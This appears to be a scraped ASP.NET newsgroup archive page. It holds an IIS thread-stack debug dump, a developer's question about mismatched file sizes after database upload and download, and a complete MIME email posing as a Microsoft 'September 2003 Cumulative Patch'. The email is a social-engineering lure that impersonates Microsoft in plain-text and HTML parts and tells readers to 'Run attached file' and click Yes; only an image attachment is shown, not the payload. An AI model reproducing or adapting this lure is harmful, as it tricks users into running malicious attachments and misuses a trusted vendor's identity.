02 01e1ff1c 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 01e1ff38 65f09ccb USER32!MsgWaitForMultipleObjects+0x1d
04 01e1ff7c 78008454 w3svc!CMTACallbackThread::Thread+0x42
05 01e1ffb4 7c57b388 MSVCRT!_endthread+0xc6
06 01e1ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 25
System Thread ID: 724
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 01e5fea8 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 01e5fef8 77e1e9a5 KERNEL32!WaitForMultipleObjectsEx+0xea
02 01e5ff54 77e1e9f2 USER32!MsgWaitForMultipleObjectsEx+0x153
03 01e5ff70 65f09d47 USER32!MsgWaitForMultipleObjects+0x1d
04 01e5ffb4 7c57b388 w3svc!OleHackThread+0x88
05 01e5ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 26
System Thread ID: 79c
Kernel Time: 0:0:20.609
User Time: 0:0:38.765
Other information: Thread is waiting for a lock to be released. Looking for
lock owner.
Owning thread System ID: 650
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 01edf648 77f8822a ntdll!ZwWaitForSingleObject+0xb
01 01edf6bc 77f8819b ntdll!RtlpWaitForCriticalSection+0x9e
02 01edf6c4 769b24a6 ntdll!RtlEnterCriticalSection+0x46
03 01edf6d8 769b245c INFOCOMM!FastFindAnonymousToken+0xe
04 01edf6ec 65f07611 INFOCOMM!TCP_AUTHENT::ClearTextLogon+0x16
05 01edf888 65f03977 w3svc!HTTP_REQ_BASE::LogonUserA+0x67e
06 01edfcac 65f0275a w3svc!HTTP_REQ_BASE::OnRestartRequest+0xa42
07 01edfcec 65f025a4 w3svc!HTTP_REQ_BASE::OnCompleteRequest+0x498
08 01edfd2c 65f02501 w3svc!HTTP_REQ_BASE::UnWrapRequest+0x1f4
09 01edfd4c 65f023b8 w3svc!HTTP_REQ_BASE::OnFillClientReq+0x7a
0a 01edfec4 65f01d97 w3svc!HTTP_REQUEST::DoWork+0x99
0b 01edfee4 65f06be5 w3svc!CLIENT_CONN::DoWork+0x1aa
0c 01edff08 65f06b58 w3svc!CreateClient+0x7b
0d 01edff4c 6d701ad2 w3svc!W3OnConnectEx+0x118
0e 01edff80 6d7029a6 ISATQ!AtqpProcessContext+0x23e
0f 01edffb4 7c57b388 ISATQ!AtqPoolThread+0x1a8
10 01edffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 27
System Thread ID: 7a0
Kernel Time: 0:0:28.328
User Time: 0:0:48.515
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 01f1ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 01f1ff7c 6d702957 KERNEL32!GetQueuedCompletionStatus+0x27
02 01f1ffb4 7c57b388 ISATQ!AtqPoolThread+0x40
03 01f1ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 28
System Thread ID: 7a4
Kernel Time: 0:0:28.109
User Time: 0:0:50.609
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 01f5ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 01f5ff7c 6d702957 KERNEL32!GetQueuedCompletionStatus+0x27
02 01f5ffb4 7c57b388 ISATQ!AtqPoolThread+0x40
03 01f5ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 29
System Thread ID: 7ac
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 0209ebe0 77f89ebd ntdll!ZwWaitForMultipleObjects+0xb
01 0209ffb4 7c57b388 ntdll!RtlpWaitThread+0x1b9
02 0209ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 30
System Thread ID: 7b4
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 020dff1c 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 020dff6c 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 020dff84 7c121fef KERNEL32!WaitForMultipleObjects+0x17
03 020dffb4 7c57b388 USERENV!NotificationThread+0x5f
04 020dffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 31
System Thread ID: 7cc
Kernel Time: 0:0:21.468
User Time: 0:0:36.171
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 0221ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0221ff7c 6d702957 KERNEL32!GetQueuedCompletionStatus+0x27
02 0221ffb4 7c57b388 ISATQ!AtqPoolThread+0x40
03 0221ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 32
System Thread ID: 828
Kernel Time: 0:0:41.265
User Time: 0:1:16.734
Thread Type: HTTP Listener
# ChildEBP RetAddr
00 0279ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0279ff7c 6d702957 KERNEL32!GetQueuedCompletionStatus+0x27
02 0279ffb4 7c57b388 ISATQ!AtqPoolThread+0x40
03 0279ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 33
System Thread ID: 9b4
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Idle ASP thread
# ChildEBP RetAddr
00 04d8ff08 7c59a1af ntdll!ZwWaitForMultipleObjects+0xb
01 04d8ff58 7c59a0c2 KERNEL32!WaitForMultipleObjectsEx+0xea
02 04d8ff70 787f58ce KERNEL32!WaitForMultipleObjects+0x17
03 04d8ffb4 7c57b388 comsvcs!CEventDispatcher::PushEvents+0x4e
04 04d8ffc0 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 34
System Thread ID: 1034
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Possible ASP page. Possible DCOM activity
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
Remote call is either to a MTA object or object not initialized. Also,
possible utility thread.
DCOM call being made to Process ID: 2304
Waiting on thread id: ffffffff
# ChildEBP RetAddr
00 04dcfb68 77d4256d ntdll!ZwRequestWaitReplyPort+0xb
01 04dcfb94 77d3ac56 RPCRT4!LRPC_CCALL::SendReceive+0x11e
02 04dcfba0 77b26c07 RPCRT4!I_RpcSendReceive+0x2c
03 04dcfbc0 77b26ad2 ole32!ThreadSendReceive+0xef
04 04dcfbd8 77b23ab6 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0x14f
05 04dcfc18 77b26946 ole32!CRpcChannelBuffer::SendReceive2+0x96
06 04dcfc28 77a6cc2a ole32!CRpcChannelBuffer::SendReceive+0x11
07 04dcfc88 77ab7e2f ole32!CAptRpcChnl::SendReceive+0xa9
08 04dcfce0 77d94c1a ole32!CCtxComChnl::SendReceive+0x124
09 04dcfcfc 77d9487d RPCRT4!NdrProxySendReceive+0x4c
0a 04dcff44 77d95136 RPCRT4!NdrClientCall2+0x4f5
0b 04dcff60 77d46e75 RPCRT4!ObjectStublessClient+0x76
0c 04dcff70 787f5818 RPCRT4!ObjectStubless+0xf
0d 04dcffb4 7c57b388 comsvcs!CEventDispatcher::GetEventServerInfoThread+0x118
0e 04dcffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 35
System Thread ID: af4
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 04f9ff38 7c59a243 ntdll!NtDelayExecution+0xb
01 04f9ff58 7c59a20e KERNEL32!SleepEx+0x32
02 04f9ff64 79e8de84 KERNEL32!Sleep+0xb
03 04f9ffb4 7c57b388 aspnet_isapi!ThreadGateThreadProc+0x6a
04 04f9ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 36
System Thread ID: 102c
Kernel Time: 0:0:0.125
User Time: 0:0:0.296
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 04fdff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 04fdff7c 79e8dda8 KERNEL32!GetQueuedCompletionStatus+0x27
02 04fdffb4 7c57b388 aspnet_isapi!ThreadPoolThreadProc+0x6e
03 04fdffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 37
System Thread ID: 1038
Kernel Time: 0:0:0.171
User Time: 0:0:0.281
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 0502ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0502ff7c 79e8dda8 KERNEL32!GetQueuedCompletionStatus+0x27
02 0502ffb4 7c57b388 aspnet_isapi!ThreadPoolThreadProc+0x6e
03 0502ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 38
System Thread ID: 9e4
Kernel Time: 0:0:0.78
User Time: 0:0:0.281
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 0506ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0506ff7c 79e8dda8 KERNEL32!GetQueuedCompletionStatus+0x27
02 0506ffb4 7c57b388 aspnet_isapi!ThreadPoolThreadProc+0x6e
03 0506ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 39
System Thread ID: 103c
Kernel Time: 0:0:0.15
User Time: 0:0:0.0
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 050aff44 7c59a243 ntdll!NtDelayExecution+0xb
01 050aff64 7c59a20e KERNEL32!SleepEx+0x32
02 050aff70 79e7ec63 KERNEL32!Sleep+0xb
03 050aff80 01b6940f aspnet_isapi!MonitorHealth+0x40
04 050affb4 7c57b388 MSVCR71!_endthread+0xaa
05 050affec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 40
System Thread ID: a44
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: WebDav Worker Thread
# ChildEBP RetAddr
00 05e9ff30 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 05e9ff5c 6b5e9a8c KERNEL32!GetQueuedCompletionStatus+0x27
02 05e9ff8c 6b5e9a44 httpext!CDavWorkerThread::GetWorkCompletion+0x23
03 05e9ffb4 7c57b388 httpext!CDavWorkerThread::ThreadDispatcher+0x30
04 05e9ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 41
System Thread ID: c98
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: WebDav Worker Thread
# ChildEBP RetAddr
00 05edff30 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 05edff5c 6b5e9a8c KERNEL32!GetQueuedCompletionStatus+0x27
02 05edff8c 6b5e9a44 httpext!CDavWorkerThread::GetWorkCompletion+0x23
03 05edffb4 7c57b388 httpext!CDavWorkerThread::ThreadDispatcher+0x30
04 05edffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 42
System Thread ID: 10a4
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: WebDav Worker Thread
# ChildEBP RetAddr
00 05f1ff30 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 05f1ff5c 6b5e9a8c KERNEL32!GetQueuedCompletionStatus+0x27
02 05f1ff8c 6b5e9a44 httpext!CDavWorkerThread::GetWorkCompletion+0x23
03 05f1ffb4 7c57b388 httpext!CDavWorkerThread::ThreadDispatcher+0x30
04 05f1ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 43
System Thread ID: fc0
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: WebDav Worker Thread
# ChildEBP RetAddr
00 05f5ff30 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 05f5ff5c 6b5e9a8c KERNEL32!GetQueuedCompletionStatus+0x27
02 05f5ff8c 6b5e9a44 httpext!CDavWorkerThread::GetWorkCompletion+0x23
03 05f5ffb4 7c57b388 httpext!CDavWorkerThread::ThreadDispatcher+0x30
04 05f5ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 44
System Thread ID: 1010
Kernel Time: 0:0:0.15
User Time: 0:0:0.0
Thread Type: WebDav Worker Thread
# ChildEBP RetAddr
00 05f9ff30 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 05f9ff5c 6b5e9a8c KERNEL32!GetQueuedCompletionStatus+0x27
02 05f9ff8c 6b5e9a44 httpext!CDavWorkerThread::GetWorkCompletion+0x23
03 05f9ffb4 7c57b388 httpext!CDavWorkerThread::ThreadDispatcher+0x30
04 05f9ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 45
System Thread ID: ddc
Kernel Time: 0:0:0.109
User Time: 0:0:0.312
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 0608ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0608ff7c 79e8dda8 KERNEL32!GetQueuedCompletionStatus+0x27
02 0608ffb4 7c57b388 aspnet_isapi!ThreadPoolThreadProc+0x6e
03 0608ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 46
System Thread ID: e88
Kernel Time: 0:0:0.0
User Time: 0:0:0.0
Thread Type: Other
# ChildEBP RetAddr
00 08a8fef8 7c599fe4 ntdll!ZwWaitForSingleObject+0xb
01 08a8ff20 7c57b3db KERNEL32!WaitForSingleObjectEx+0x71
02 08a8ff30 67de6ddf KERNEL32!WaitForSingleObject+0xf
03 08a8ff70 67f6cf08 fp4amsft!VmetabaseSinkThread::t_main+0x102
04 08a8ff7c 780085bc fp4Autl!Vthread::top+0xd
05 08a8ffb4 7c57b388 MSVCRT!_endthreadex+0xc1
06 08a8ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 47
System Thread ID: b98
Kernel Time: 0:0:0.31
User Time: 0:0:0.125
Thread Type: ASP
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
# ChildEBP RetAddr
00 0c36ff50 7c5853d7 ntdll!ZwRemoveIoCompletion+0xb
01 0c36ff7c 79e8dda8 KERNEL32!GetQueuedCompletionStatus+0x27
02 0c36ffb4 7c57b388 aspnet_isapi!ThreadPoolThreadProc+0x6e
03 0c36ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 48
System Thread ID: 116c
Kernel Time: 0:0:28.171
User Time: 0:0:43.671
Thread Type: Possible ASP page. Possible DCOM activity
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
No remote call being made
# ChildEBP RetAddr
00 0dd4fe24 77d37ba7 ntdll!ZwReplyWaitReceivePortEx+0xb
01 0dd4ff74 77d37b4c RPCRT4!LRPC_ADDRESS::ReceiveLotsaCalls+0x74
02 0dd4ff78 77d359c3 RPCRT4!RecvLotsaCallsWrapper+0x9
03 0dd4ffa8 77d358d6 RPCRT4!BaseCachedThreadRoutine+0x11f
04 0dd4ffb4 7c57b388 RPCRT4!ThreadStartRoutine+0x18
05 0dd4ffec 00000000 KERNEL32!BaseThreadStart+0x52
Thread ID: 49
System Thread ID: 13fc
Kernel Time: 0:0:28.234
User Time: 0:0:45.343
Thread Type: Possible ASP page. Possible DCOM activity
Executing Page: ASP.dll symbols not found. Unable to locate ASP page.
Continuing with other analysis.
....
- 14
- ASP.Net >> weird....different size between uploading and downloading???Hi,
I've written code web-based uploading and downloading.
Here is some code for it.
For saving file into MS-SQL database,
SaveFileIntoDB(HttpPostedFile file) {
int fileLength = file.ContentLength;
byte[] fileContent = new byte[fileLength];
int lastPos = file.FileName.LastIndexOf('\\');
fileName = file.FileName.Substring(++lastPos);
file.InputStream.Read(fileContent,0,fileLength);
String fileContentType = file.ContentType;
// Save fileLength,fileName and fileContent into MS-SQL database
// data type of fileLength(column name : filelength) is int
// data type of fileName(column name : filename) is varchar(100)
// data type of fileContent(column name : filecontent) is image.
// data type of fileContent type(column name : contenttype) is
varchar(100)
DB.Save(......);
}
For downloading the file from the DB.
Download() {
// Fetch the file info into db variable from the DB.
int filesize = Convert.ToInt32(db["filesize"].ToString());
byte[] fcontent = db["filecontent"] as byte[];
ms = new MemoryStream();
ms.Position = 0;
ms.Write(fcontent,0,fcontent.Length);
Response.AppendHeader("Content-Disposition",
"filename=" + db["filename"].ToString());
Response.ContentType = db["contenttype"].ToString();
Response.OutputStream.Write(ms.GetBuffer(),0,Convert.ToInt32(ms.Length));
}
For saving the file info to the sql db, it worked as I expected. Also, when
I tried to download the file that I saved into the db, it worked, HOWEVER,
when I checked the filesize, it was DIFFERENT. Do you have any idea why?
For example,
Suppose that I uploaded "A.exe" file into the sql db.
The file size of A. exe was 5113 Bytes.
If I downloaded the A.exe, and then when I checked the file size,
it was 5,896 Bytes.
I think that it should be same size since it was same file.
Always whenever I download the file that I've uploaded, the file size is
slighlty bigger than uploaded file. I really couldn't find any reason....
After downloading, the file seems like working well, but I guess it must be
something wrong since it was different file size.
If you could give any ideas about this issue, I really appreciate it.
Thanks.
- 15
- ASP.Net >> Try that important patch--rleikizfozf
Content-Type: multipart/related; boundary="afmzqybrhlgzp";
type="multipart/alternative"
--afmzqybrhlgzp
Content-Type: multipart/alternative; boundary="luoksalejyvhogmi"
--luoksalejyvhogmi
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Microsoft Client
this is the latest version of security update, the
"September 2003, Cumulative Patch" update which resolves
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three new vulnerabilities.
Install now to help maintain the security of your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality =
of all previously released patches.
System requirements: Windows 95/98/Me/2000/NT/XP
This update applies to:
- MS Internet Explorer, version 4.01 and later
- MS Outlook, version 8.00 and later
- MS Outlook Express, version 4.01 and later
Recommendation: Customers should install the patch =
at the earliest opportunity.
How to install: Run attached file. Choose Yes on displayed dialog box.
How to use: You don't need to do anything after installing this item.
Microsoft Product Support Services and Knowledge Base articles =
can be found on the Microsoft Technical Support web site.
http://support.microsoft.com/
For security-related information about Microsoft products, please =
visit the Microsoft Security Advisor web site
http://www.microsoft.com/security/
Thank you for using Microsoft products.
Please do not reply to this message.
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.
----------------------------------------------
The names of the actual companies and products mentioned =
herein are the trademarks of their respective owners.
--luoksalejyvhogmi
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none}
</style>
</HEAD>
<BODY BGCOLOR=3D"White" TEXT=3D"Black">
<BASEFONT SIZE=3D"2" face=3D"verdana,arial">
<TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB">
<TR height=3D"20">
<TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">
<FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/"
TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A>
</B></I></FONT>
</TD>
<TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP>
<FONT color=3D"#ffffff" size=3D1>
<A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' =
target=3D"_top">All Products</A> |
<A class=3D'navtext' href=3D'http://support.microsoft.com/' =
target=3D"_top">Support</A> |
<A class=3D'navtext' href=3D'http://search.microsoft.com/' =
target=3D"_top">Search</A> |
<A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top>
Microsoft.com Guide</A>
</FONT>
</TD>
</TR>
<TR>
<TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP>
<FONT FACE=3D"Verdana, Arial" SIZE=3D1><B>
<A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top">
Microsoft Home</A> </B>
</FONT>
</TD>
</TR>
</TABLE>
<IMG SRC=3D"cid:gchcguk" BORDER=3D"0"><BR><BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Client<BR><BR>
this is the latest version of security update, the
"September 2003, Cumulative Patch" update which resolves
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
as well as three new vulnerabilities.
Install now to help maintain the security of your computer
from these vulnerabilities, the most serious of which could
allow an attacker to run code on your computer.
This update includes the functionality =
of all previously released patches.
</FONT></TD></TR>
</TABLE>
<BR><BR>
<TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600">
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:ueimgmx" =
ALIGN=3D"absmiddle" BORDER=3D"0"> System requirements</B>
</FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:ueimgmx" =
ALIGN=3D"absmiddle" BORDER=3D"0"> This update applies to</B>
</FONT></TD><TD NOWRAP>
<FONT SIZE=3D"1">
MS Internet Explorer, version 4.01 and later<BR>
MS Outlook, version 8.00 and later<BR>
MS Outlook Express, version 4.01 and later
</FONT>
</TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:ueimgmx" =
ALIGN=3D"absmiddle" BORDER=3D"0"> Recommendation</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch =
at the earliest opportunity.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:ueimgmx" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to install</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">Run attached file. =
Choose Yes on displayed dialog box.</FONT></TD>
</TR>
<TR VALIGN=3D"TOP">
<TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:ueimgmx" =
ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Product Support Services and Knowledge Base articles
can be found on the <A HREF=3D"http://support.microsoft.com/" =
TARGET=3D"_top">Microsoft Technical Support</A> web site. =
For security-related information about Microsoft products, please =
visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top">
Microsoft Security Advisor</A> web site, =
or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" =
TARGET=3D"_top">Contact Us.</A>
<BR><BR>
Thank you for using Microsoft products.<BR><BR></FONT>
<FONT SIZE=3D"1">Please do not reply to this message. =
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.<BR></FONT>
<HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%">
<FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and =
products mentioned herein are the trademarks =
of their respective owners.</FONT>
</TD></TR></TABLE>
<BR>
<TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB">
<TR VALIGN=3D"TOP">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/=
contactus/contactus.asp" TARGET=3D"_top">Contact Us</A>
|
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" =
TARGET=3D"_top">Legal</A>
|
<A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" =
TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A>
</FONT></B>
</TD>
</TR>
<TR VALIGN=3D"MIDDLE">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1">
©2003 Microsoft Corporation. All rights reserved.
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/cpyright.htm" TARGET=3D"_top">Terms of Use</A>
|
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/privacy.htm" TARGET=3D"_top">
Privacy Statement</A> |
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
enable/" TARGET=3D"_top">Accessibility</A>
</FONT>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
--luoksalejyvhogmi--
--afmzqybrhlgzp
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <gchcguk>
R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy
zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29
yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX
55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z
3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk
3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt
9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx
/+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r
9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV
606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO
X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg
4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI
sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg
mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD
JHX5UiagQILcNMtKl26zu3etuBgUaKcePXv0QIo0iSjaw8raROKYh6nbuFbmVpVlpbKby4Mya858
eWrlrV0l/fECWDBhw4hPimoJUw9NQVa0Yg6kk6dPmD9xt/Xi52kgKG4GCRLtpTjZNmZTQ5yktLXT
QFNDA+qJe2wkkgkrrmWrx4tv0X6M/gvFrnzh6uaO+wCKOhzs7TzWyUesyDom7z9//EAKOh51eYKK
sdWWH1D15cd78J12GFJKufRXcfwNNtR/ANYXE006UfdSfBQq1lxM3fFHWFlojRBCCA5goMMK5y3V
1B879VGdUMlRqIxaG7kUmHEikVTjQyuAcGIGDmSQwQUYzPBAA1UIKJMfUCI4Vhs2EjTJKrWYwogp
mXSxY0iTTLhQAC2ocKIDHGywgAwYWPDAm3AeIIVztr3E1FiFVSnQJLXc4ksxuujyiy6npNGFYBKK
WRAzKZipAgkp8ACCAyLg0MClDcD5ppIUVNCFFDL1oSF8Qvn3nyi8+KIqMH8aQwwx/66EMQcoVQxG
mI/KBEBCCCSo0MIPLJSJwA6YFvsmBlFkYgopUTxwgQ8XXGBBBRUA0QUXeJp6qi2r2rKLLcAU42qs
WIRhR623YpdDNM4wQ0IOInggrwfFNoCDDl20wooqqaSCCil3SHCBBgQXnAGbFmCAgQMkBKDnLsMU
4wswvPCySy3DuLpJGFiY4YodX6RrUhnOIFDDvPNeqkkXfKzCyssv8+svwM5uYPPNONusAZszEEEE
GoooQsfQdRRdxyJII83I0ow04nQjjkTtCB5cVN3KMBEXA8wuFbMC6Cu5jIJFLsG4oonIQeQQQw4o
a5KsI6moogrMMMvt77+kCPzB3v589+03BxdQ0IFyotyCdTFap7I1K7Z4YskmcIwSTC+9KMHGSD6S
0AIJHkRxByekkIJKv3LPXbfMeOddgQmst+466xoAIUEEEUzAQNBD02H00UkvwnTTT0s9ddV4ZPEK
1hH/qTUnlyDyRi659BJMMLiEgrkoQSwTAjMefPIJ6KKPHnfppfeLCt6cCDFDmjT8AMP7MJywwQW0
1187Aco5osUYyGNtjC+ccFwhzuCK6U0OF2uoQht8FAMEoMADnfge+M7Xrwpa8HyhI0X6JGCwDGhg
fvYLoe1wRzSj9c53THsa1KRGNS6oYQxZ0AXyjKGLUlzCEoeIQxjIRjnKTYESC/7EnjJyYAIRRMF7
4Auf+Cp4vtRxghNOiEAHjxTC+k3gfsp5ghPSAIqMBeoUlkjEIeYgBzjwEBdonEIOgmgWSDlgC0h8
